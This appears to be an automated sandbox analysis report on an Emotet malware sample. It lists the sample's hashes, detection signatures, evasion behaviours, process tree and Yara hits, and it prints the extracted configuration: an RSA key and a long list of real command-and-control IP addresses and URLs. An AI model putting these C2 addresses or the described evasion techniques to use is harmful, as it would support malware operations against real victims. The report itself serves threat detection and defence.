Loading ...

Play interactive tourEdit tour

Windows Analysis Report RpcNs4.exe

Overview

General Information

Sample Name:RpcNs4.exe
Analysis ID:492876
MD5:1ed37c4a225bbd35716cf241e14541a8
SHA1:51caf718c3d85847e9f9246b291149a0a7afb698
SHA256:8b504e796986fbae7d1bea49c95dfad222758cca5cada56472f40a0bde41e485
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • RpcNs4.exe (PID: 5968 cmdline: 'C:\Users\user\Desktop\RpcNs4.exe' MD5: 1ED37C4A225BBD35716CF241E14541A8)
    • networkitemfactory.exe (PID: 900 cmdline: C:\Windows\SysWOW64\rasphone\networkitemfactory.exe MD5: 1ED37C4A225BBD35716CF241E14541A8)
  • svchost.exe (PID: 4840 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3228 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4228 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5992 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2852 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5984 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1752 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5780 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 2252 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB", "C2 list": ["190.191.171.72:80", "5.189.168.53:8080", "162.241.41.111:7080", "190.85.46.52:7080", "37.205.9.252:7080", "172.96.190.154:8080", "120.51.34.254:80", "181.95.133.104:80", "139.59.61.215:443", "157.7.164.178:8081", "41.185.29.128:8080", "86.57.216.23:80", "185.80.172.199:80", "54.38.143.245:8080", "41.212.89.128:80", "223.17.215.76:80", "37.187.100.220:7080", "167.71.227.113:8080", "8.4.9.137:8080", "113.160.248.110:80", "220.147.247.145:80", "60.125.114.64:443", "182.227.240.189:443", "45.177.120.37:8080", "103.229.73.17:8080", "117.247.235.44:80", "115.78.11.155:80", "79.133.6.236:8080", "139.59.12.63:8080", "91.83.93.103:443", "186.20.52.237:80", "185.208.226.142:8080", "115.79.195.246:80", "116.202.10.123:8080", "162.144.42.60:8080", "185.142.236.163:443", "172.105.78.244:8080", "37.46.129.215:8080", "157.245.138.101:7080", "182.253.83.234:7080", "143.95.101.72:8080", "187.189.66.200:8080", "103.48.68.173:80", "200.116.93.61:80", "223.135.30.189:80", "36.91.44.183:80", "198.57.203.63:8080", "203.153.216.178:7080", "46.32.229.152:8080", "51.38.201.19:7080", "103.93.220.182:80", "103.133.66.57:443", "202.166.170.43:80", "95.216.205.155:8080", "77.74.78.80:443", "78.114.175.216:80", "189.150.209.206:80", "113.156.82.32:80", "58.27.215.3:8080", "192.241.220.183:8080", "185.86.148.68:443", "74.208.173.91:8080", "126.126.139.26:443", "88.247.58.26:80", "49.243.9.118:80", "2.144.244.204:80", "138.201.45.2:8080", "91.75.75.46:80", "119.92.77.17:80", "202.153.220.157:80", "46.105.131.68:8080", "178.33.167.120:8080", "190.192.39.136:80", "115.176.16.221:80", "179.5.118.12:80", "190.190.15.20:80", "113.161.148.81:80", "14.241.182.160:80", "192.163.221.191:8080", "128.106.187.110:80", "190.194.12.132:80", "75.127.14.170:8080", "195.201.56.70:8080", "118.243.83.70:80", "50.116.78.109:8080", "192.210.217.94:8080", "103.80.51.61:8080"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.517659433.0000000000510000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000002.00000002.256801219.00000000005F4000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000002.00000002.256746048.00000000005E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000004.00000002.519022380.0000000002094000.00000004.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.RpcNs4.exe.5e279e.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              2.2.RpcNs4.exe.20b0000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                4.2.networkitemfactory.exe.51279e.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.2.RpcNs4.exe.5e052e.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    4.2.networkitemfactory.exe.20b0000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 5 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 2.2.RpcNs4.exe.20b0000.3.unpackMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB", "C2 list": ["190.191.171.72:80", "5.189.168.53:8080", "162.241.41.111:7080", "190.85.46.52:7080", "37.205.9.252:7080", "172.96.190.154:8080", "120.51.34.254:80", "181.95.133.104:80", "139.59.61.215:443", "157.7.164.178:8081", "41.185.29.128:8080", "86.57.216.23:80", "185.80.172.199:80", "54.38.143.245:8080", "41.212.89.128:80", "223.17.215.76:80", "37.187.100.220:7080", "167.71.227.113:8080", "8.4.9.137:8080", "113.160.248.110:80", "220.147.247.145:80", "60.125.114.64:443", "182.227.240.189:443", "45.177.120.37:8080", "103.229.73.17:8080", "117.247.235.44:80", "115.78.11.155:80", "79.133.6.236:8080", "139.59.12.63:8080", "91.83.93.103:443", "186.20.52.237:80", "185.208.226.142:8080", "115.79.195.246:80", "116.202.10.123:8080", "162.144.42.60:8080", "185.142.236.163:443", "172.105.78.244:8080", "37.46.129.215:8080", "157.245.138.101:7080", "182.253.83.234:7080", "143.95.101.72:8080", "187.189.66.200:8080", "103.48.68.173:80", "200.116.93.61:80", "223.135.30.189:80", "36.91.44.183:80", "198.57.203.63:8080", "203.153.216.178:7080", "46.32.229.152:8080", "51.38.201.19:7080", "103.93.220.182:80", "103.133.66.57:443", "202.166.170.43:80", "95.216.205.155:8080", "77.74.78.80:443", "78.114.175.216:80", "189.150.209.206:80", "113.156.82.32:80", "58.27.215.3:8080", "192.241.220.183:8080", "185.86.148.68:443", "74.208.173.91:8080", "126.126.139.26:443", "88.247.58.26:80", "49.243.9.118:80", "2.144.244.204:80", "138.201.45.2:8080", "91.75.75.46:80", "119.92.77.17:80", "202.153.220.157:80", "46.105.131.68:8080", "178.33.167.120:8080", "190.192.39.136:80", "115.176.16.221:80", "179.5.118.12:80", "190.190.15.20:80", "113.161.148.81:80", "14.241.182.160:80", "192.163.221.191:8080", "128.106.187.110:80", "190.194.12.132:80", "75.127.14.170:8080", "195.201.56.70:8080", "118.243.83.70:80", "50.116.78.109:8080", "192.210.217.94:8080", "103.80.51.61:8080"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: RpcNs4.exeVirustotal: Detection: 78%Perma Link
                      Source: RpcNs4.exeMetadefender: Detection: 73%Perma Link
                      Source: RpcNs4.exeReversingLabs: Detection: 89%
                      Antivirus / Scanner detection for submitted sampleShow sources
                      Source: RpcNs4.exeAvira: detected
                      Machine Learning detection for sampleShow sources
                      Source: RpcNs4.exeJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B2240 CryptEncrypt,memcpy,CryptGetHashParam,CryptDuplicateHash,CryptDestroyHash,CryptExportKey,4_2_020B2240
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B2580 CryptCreateHash,CryptAcquireContextW,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptImportKey,LocalFree,CryptGenKey,GetProcessHeap,RtlAllocateHeap,4_2_020B2580
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B1F60 memcpy,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,4_2_020B1F60
                      Source: RpcNs4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_020B3890 _snwprintf,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,2_2_020B3890
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B3890 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,4_2_020B3890

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 190.191.171.72:80
                      Source: Malware configuration extractorIPs: 5.189.168.53:8080
                      Source: Malware configuration extractorIPs: 162.241.41.111:7080
                      Source: Malware configuration extractorIPs: 190.85.46.52:7080
                      Source: Malware configuration extractorIPs: 37.205.9.252:7080
                      Source: Malware configuration extractorIPs: 172.96.190.154:8080
                      Source: Malware configuration extractorIPs: 120.51.34.254:80
                      Source: Malware configuration extractorIPs: 181.95.133.104:80
                      Source: Malware configuration extractorIPs: 139.59.61.215:443
                      Source: Malware configuration extractorIPs: 157.7.164.178:8081
                      Source: Malware configuration extractorIPs: 41.185.29.128:8080
                      Source: Malware configuration extractorIPs: 86.57.216.23:80
                      Source: Malware configuration extractorIPs: 185.80.172.199:80
                      Source: Malware configuration extractorIPs: 54.38.143.245:8080
                      Source: Malware configuration extractorIPs: 41.212.89.128:80
                      Source: Malware configuration extractorIPs: 223.17.215.76:80
                      Source: Malware configuration extractorIPs: 37.187.100.220:7080
                      Source: Malware configuration extractorIPs: 167.71.227.113:8080
                      Source: Malware configuration extractorIPs: 8.4.9.137:8080
                      Source: Malware configuration extractorIPs: 113.160.248.110:80
                      Source: Malware configuration extractorIPs: 220.147.247.145:80
                      Source: Malware configuration extractorIPs: 60.125.114.64:443
                      Source: Malware configuration extractorIPs: 182.227.240.189:443
                      Source: Malware configuration extractorIPs: 45.177.120.37:8080
                      Source: Malware configuration extractorIPs: 103.229.73.17:8080
                      Source: Malware configuration extractorIPs: 117.247.235.44:80
                      Source: Malware configuration extractorIPs: 115.78.11.155:80
                      Source: Malware configuration extractorIPs: 79.133.6.236:8080
                      Source: Malware configuration extractorIPs: 139.59.12.63:8080
                      Source: Malware configuration extractorIPs: 91.83.93.103:443
                      Source: Malware configuration extractorIPs: 186.20.52.237:80
                      Source: Malware configuration extractorIPs: 185.208.226.142:8080
                      Source: Malware configuration extractorIPs: 115.79.195.246:80
                      Source: Malware configuration extractorIPs: 116.202.10.123:8080
                      Source: Malware configuration extractorIPs: 162.144.42.60:8080
                      Source: Malware configuration extractorIPs: 185.142.236.163:443
                      Source: Malware configuration extractorIPs: 172.105.78.244:8080
                      Source: Malware configuration extractorIPs: 37.46.129.215:8080
                      Source: Malware configuration extractorIPs: 157.245.138.101:7080
                      Source: Malware configuration extractorIPs: 182.253.83.234:7080
                      Source: Malware configuration extractorIPs: 143.95.101.72:8080
                      Source: Malware configuration extractorIPs: 187.189.66.200:8080
                      Source: Malware configuration extractorIPs: 103.48.68.173:80
                      Source: Malware configuration extractorIPs: 200.116.93.61:80
                      Source: Malware configuration extractorIPs: 223.135.30.189:80
                      Source: Malware configuration extractorIPs: 36.91.44.183:80
                      Source: Malware configuration extractorIPs: 198.57.203.63:8080
                      Source: Malware configuration extractorIPs: 203.153.216.178:7080
                      Source: Malware configuration extractorIPs: 46.32.229.152:8080
                      Source: Malware configuration extractorIPs: 51.38.201.19:7080
                      Source: Malware configuration extractorIPs: 103.93.220.182:80
                      Source: Malware configuration extractorIPs: 103.133.66.57:443
                      Source: Malware configuration extractorIPs: 202.166.170.43:80
                      Source: Malware configuration extractorIPs: 95.216.205.155:8080
                      Source: Malware configuration extractorIPs: 77.74.78.80:443
                      Source: Malware configuration extractorIPs: 78.114.175.216:80
                      Source: Malware configuration extractorIPs: 189.150.209.206:80
                      Source: Malware configuration extractorIPs: 113.156.82.32:80
                      Source: Malware configuration extractorIPs: 58.27.215.3:8080
                      Source: Malware configuration extractorIPs: 192.241.220.183:8080
                      Source: Malware configuration extractorIPs: 185.86.148.68:443
                      Source: Malware configuration extractorIPs: 74.208.173.91:8080
                      Source: Malware configuration extractorIPs: 126.126.139.26:443
                      Source: Malware configuration extractorIPs: 88.247.58.26:80
                      Source: Malware configuration extractorIPs: 49.243.9.118:80
                      Source: Malware configuration extractorIPs: 2.144.244.204:80
                      Source: Malware configuration extractorIPs: 138.201.45.2:8080
                      Source: Malware configuration extractorIPs: 91.75.75.46:80
                      Source: Malware configuration extractorIPs: 119.92.77.17:80
                      Source: Malware configuration extractorIPs: 202.153.220.157:80
                      Source: Malware configuration extractorIPs: 46.105.131.68:8080
                      Source: Malware configuration extractorIPs: 178.33.167.120:8080
                      Source: Malware configuration extractorIPs: 190.192.39.136:80
                      Source: Malware configuration extractorIPs: 115.176.16.221:80
                      Source: Malware configuration extractorIPs: 179.5.118.12:80
                      Source: Malware configuration extractorIPs: 190.190.15.20:80
                      Source: Malware configuration extractorIPs: 113.161.148.81:80
                      Source: Malware configuration extractorIPs: 14.241.182.160:80
                      Source: Malware configuration extractorIPs: 192.163.221.191:8080
                      Source: Malware configuration extractorIPs: 128.106.187.110:80
                      Source: Malware configuration extractorIPs: 190.194.12.132:80
                      Source: Malware configuration extractorIPs: 75.127.14.170:8080
                      Source: Malware configuration extractorIPs: 195.201.56.70:8080
                      Source: Malware configuration extractorIPs: 118.243.83.70:80
                      Source: Malware configuration extractorIPs: 50.116.78.109:8080
                      Source: Malware configuration extractorIPs: 192.210.217.94:8080
                      Source: Malware configuration extractorIPs: 103.80.51.61:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49736 -> 190.191.171.72:80
                      Source: Joe Sandbox ViewASN Name: GIGAINFRASoftbankBBCorpJP GIGAINFRASoftbankBBCorpJP
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: global trafficTCP traffic: 192.168.2.5:49745 -> 5.189.168.53:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49751 -> 162.241.41.111:7080
                      Source: global trafficTCP traffic: 192.168.2.5:49785 -> 190.85.46.52:7080
                      Source: global trafficTCP traffic: 192.168.2.5:49790 -> 37.205.9.252:7080
                      Source: unknownNetwork traffic detected: IP country count 36
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.191.171.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.191.171.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.191.171.72
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.189.168.53
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.189.168.53
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.189.168.53
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.41.111
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.41.111
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.241.41.111
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.85.46.52
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.85.46.52
                      Source: unknownTCP traffic detected without corresponding DNS query: 190.85.46.52
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.205.9.252
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.205.9.252
                      Source: unknownTCP traffic detected without corresponding DNS query: 37.205.9.252
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.96.190.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.96.190.154
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.96.190.154
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://162.241.41.111:7080/LYQRy6c93vecgvHJfH5/EZsl1rJ8QXw/bisGJm2RzFKv/0FbacJYj1q62Xn/
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://162.241.41.111:7080/LYQRy6c93vecgvHJfH5/EZsl1rJ8QXw/bisGJm2RzFKv/0FbacJYj1q62Xn/2
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/5
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/c/IfhZZOLYmyGUpB2z7/y67uuC8o/
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/p
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://190.191.171.72/e7oyvJu0ryVUBL/0INT0lnzMU2/MpBFVePNcAJo4Omc/IfhZZOLYmyGUpB2z7/y67uuC8o/
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://190.85.46.52:7080/1CMBtWf1oEz5/
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://190.85.46.52:7080/1CMBtWf1oEz5/f
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://190.85.46.52:7080/1CMBtWf1oEz5/m32
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://37.205.9.252:7080/RFYvVKd2K/sy7dp7xsNv9/Rrh3Sh9wg/SwbGDOylYnDUpHudO/ri7bprIvQeGD/Bd2yo6ti2p6c
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://5.189.168.53:8080/o3fBhuuz/
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://5.189.168.53:8080/o3fBhuuz/#
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://5.189.168.53:8080/o3fBhuuz/3
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://5.189.168.53:8080/o3fBhuuz/i
                      Source: networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpString found in binary or memory: http://5.189.168.53:8080/o3fBhuuz/m
                      Source: svchost.exe, 00000005.00000002.519834016.000001A00E260000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000005.00000002.519834016.000001A00E260000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000000A.00000002.310050189.000001BD7A813000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000002.310130711.000001BD7A842000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000002.310130711.000001BD7A842000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309396699.000001BD7A862000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.310050189.000001BD7A813000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309474542.000001BD7A845000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.309474542.000001BD7A845000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.310115050.000001BD7A839000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000002.310050189.000001BD7A813000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.20b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.20b0000.3.unpack, type: UNPACKEDPE
